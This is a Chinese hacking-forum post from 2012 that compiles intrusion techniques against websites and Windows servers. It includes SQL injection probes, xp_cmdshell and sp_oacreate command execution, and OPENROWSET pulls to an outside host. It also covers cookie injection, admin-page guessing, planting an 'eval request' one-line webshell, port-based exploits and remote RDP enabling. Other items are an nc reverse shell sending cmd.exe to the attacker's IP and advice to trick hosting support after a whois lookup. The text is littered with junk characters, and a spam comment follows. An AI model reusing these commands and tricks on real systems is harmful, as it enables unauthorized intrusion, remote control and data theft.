中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]

作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关# k- o& n$ ?  t5 I! J

) y) S; [3 W$ Z# F/ ?
, X/ z) Z( Y; l- v5 mSA点数据库分离搞法+语句:
$ W$ G, g2 {* M. z. u
" C1 y+ I% h2 [9 [. m! a注射点不显错,执行下面三条语句页面都返回正常。  `4 ?, x+ E8 r% Z2 O; W8 l! U
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
- U3 f( U, h3 [4 Q& }and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
0 M/ z# P* H6 T# p, @5 Dand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
7 ^- ]7 c, X5 ~/ @可以列目录,判断系统为2000,web与数据库分离
! S9 l' G" ~) i  w5 g- r: T遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。6 I+ q5 A$ f' y7 M& h. [5 A
在注射点上执行
& O) c1 {4 n4 l! |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
& {0 g( T% k! e) G$ r$ w% {9 n页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP8 ?9 }! y$ r# ?  m' V
还有我用NC监听得其他端口都没有得到IP。
5 P  W# k7 r% P2 Q: Y( j" n
3 r- S6 h- \2 y/ \通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
; J" V. q( ^3 R9 T4 r" s6 a' j'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--4 D( {" X2 H# b' K" w$ y+ ]

1 S" o# J2 A6 m* j! m& f! b: u;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
) i* n5 X; \, n) [2 k# E1 t- |8 A0 g, Z* Q" v) X( M3 C' V) k
现在就猜想是不是数据库是内网而且不能连外网。
; E/ V, I6 s/ c. {* r2 f- F# _

  T, N- N0 L3 S% L6 p# waccess导出txt文本代码! q1 v0 y* N( s3 b4 B, }
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
8 r' N/ I7 t0 p' i: V/ _
, Z. M6 r3 V' o& K- `; {' [2 h4 Y: f7 ]/ ~0 |
" D0 ^1 v. w, A0 A. w, d. h
自动跳转到指定网站代码头4 E+ v: q3 P8 S8 C
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
! l( ^* C2 x6 m1 z
0 s: h7 q/ d% X3 S$ b' _% }& t0 ~6 J7 [; k. i- B& }( c
入侵java or jsp站点时默认配置文件路径:
" c+ ]0 J5 Z* v/ A7 y8 _\web-inf\web.xml& I# E. ?  M7 X5 f
tomcat下的配置文件位置:
! @2 j7 X5 H) E, E/ h\conf\server.xml            (前面加上tomcat路径)
+ ^: S1 I1 b6 l\Tomcat 5.0\webapps\root\web-inf\struts-config.xml8 \3 m7 r( j" {2 w8 A
! _9 R9 W$ \# b: l/ Q# r' C4 t
# P; b; z4 j6 K& `* [+ Z0 A1 s9 Q8 Q

  e- x. \3 V3 a  p7 j% o$ b检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:  j5 W$ }' W0 K9 r. Z) @+ J  n, B
-1%236 P! O2 r7 c& i: z' F
> : ?/ Q% a* i6 j  d: C+ @7 p
<
! l6 M$ }5 |* K5 E  }, ]1'+or+'1'='11 B/ a' p0 ]0 I# B- r0 B3 _1 f
id=8%bf9 H; L6 ?. S: L+ y( c

8 C- Y4 v' Q/ P  |$ m4 k全新注入点检测试法:/ {5 Z+ v2 Q  A% ?1 c0 C# c
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
: T7 k3 [4 o0 ?. A( ?5 {6 i  ~/ N" w4 X! w6 V( P
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
* Z' y0 f4 q! }
5 b) e* m7 Y2 d搜索型注入判断方法:
" t5 ~) y. l9 p2 y6 U! F北京%' and '1'='1' and '%'='
" y7 L1 }8 N% D北京%' and '1'='2' and '%'='3 m0 f" W% Y8 E( x" W
) ?9 L  E) T* A) M$ C
) ?) r% L- H" z8 {) G* ^: N& G
COOKIES注入:) S" n' H: v2 S) K
4 b( C  ~) O" x& E) k9 k; a0 n* A. S
javascript:alert(document.cookie="id="+escape("51 and 1=1"));- U" C4 I# t. v( r  x$ A
/ Z% Q4 ]* l+ q' q
2000专业版查看本地登录用户命令:1 H% s* }! _$ J0 F
net config workstation
  J" t4 c! i! _# G0 J+ V1 Q/ A* Q- G8 m, L* `. c" z$ V% V1 t9 m

; R% u! J( N: q( r9 _5 U1 a2003下查看ipsec配置和默认防火墙配置命令:/ c2 F% ?; F7 S9 d3 P& R" C+ h+ I
netsh firewall show config
# ]5 `4 ]0 A9 C2 mnetsh ipsec static show all! ~" h- q$ k* ]! t
4 h7 _, \* }0 e
不指派指定策略命令:/ }3 F) S* E9 S; ^$ \; U8 k8 j0 w
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
( b& [: @( h1 k& A( y9 z, H0 Vnetsh ipsec static show policy all  显示策略名
. S. O; G4 X, t, _, Y+ a+ ?5 @$ Q- L4 n0 F% G1 Y, N0 b# f% M+ E

. L& a- V7 p# C# j猜管理员后台小技巧:
8 X1 B  l- B$ N* N) tadmin/left.asp 7 M- a0 m2 U  O4 I
admin/main.asp
. n7 N& z: E. E2 h5 i& X9 v* Cadmin/top.asp
& Z3 [5 g5 R2 Nadmin/admin.asp
$ a) D7 p" \: n- Z会现出菜单导航,然后迅雷下载全部链接, B' I: x& h. x
- p+ V: \! c- N' L/ N! R! r9 n, n

1 W4 c0 s" J$ ~, d7 R4 d9 x& v, ~社会工程学:' p) b8 `& H3 k9 b
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
/ p1 s" W+ {" v; ]. k- V然后去骗客服% d) m% }1 X3 q  e% h1 E, n# K

, S% i9 z2 p5 }1 h* z
; c+ q% j5 O! Q) w7 O( V% D统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
( w3 _9 z: D/ g" D* b9 h& v  O查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
& c3 y9 K0 n7 \) T* ], I% t  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。9 ]  M+ m( g8 m, W. w

  b" w$ w% T  K" \- g, d
+ B$ q/ x  H* V6 `! q8 i& l, y+ D' ?8 D" n
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
7 J  A  x$ N( ^; I. b- z( v+ m7 Z$ k$ V4 ^0 E/ [; E8 \6 ^7 W" U( g1 ~& E
) _" s! e* k  h# e; N7 z

" `% b) x7 I# A3 S( b- V* X" A7 NCMD加密注册表位置
4 G7 P4 z, G6 ]2 _) _/ J3 D(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
) s! O$ R* D; T% w/ ^/ }AutoRun* z6 f' \+ l& ~. ^1 l: S' ]

# z2 r% ?! g. P3 X! o' y; k(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
* m8 \  v3 s  Q. M! x7 GAutoRun2 r( b2 J7 `& x- w
) F6 a: X. \3 ]) Z0 c/ m& [

7 d& F2 ~9 L% Z# x! p, l在找注入时搜索Hidden,把他改成test
2 {& }# s4 g. V3 T5 @
1 f# Z9 L% s+ s9 R  M! u4 i' d
# z4 t* J0 v4 z3 q7 I- o
mstsc /v:IP /console , C3 L" T& R2 F, v& S* z9 t

' |5 m) e' `% H/ V* L1 W3 C% }  m6 e6 d4 _& h+ h# {( `
一句话开3389:
" a4 s( V; P7 ~8 Q/ V0 [; H/ s
9 ^( p# J% J- R2 ^最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
. t$ \: V" B  P$ Y- E开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
+ A9 K/ q3 N' t3 O; p0 q! h1 y! d
- h1 f* Z: x* t
7 T- q5 N9 U; ?* h" m3 t- c知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
" K" d7 r3 V( T9 f. NInsert into admin(user,pwd) values('test','test')" j& d% ~5 E! H; E7 B: {3 Y: c

" t+ C5 @. a7 y# Z' S" ^2 M  o1 D
8 ^7 w/ |( D! d8 D; SNC反弹- a( g9 f) L& H) d' ?% ~
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
$ k  h; A8 N  n; y$ u然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)0 q, w# `" Q# |3 J0 `% L

( n! j: V1 i2 {2 \; m
1 {. M% X, @( B& f3 D/ c/ X在脚本入侵过程中要经常常试用%00来确认下参数是否有问题( ?8 M0 b$ b$ \/ ?) G' Y/ n

$ W3 I; C! L5 o# d6 ~3 a4 z0 d有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录  F! z9 F9 {3 t. O) a' z4 d1 O
例如:
3 T0 k5 G+ l. b0 h4 Q- G1 psubst k: d:\www\ 用d盘www目录替代k盘. @& ]1 @2 S- }6 Y3 ^
subst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2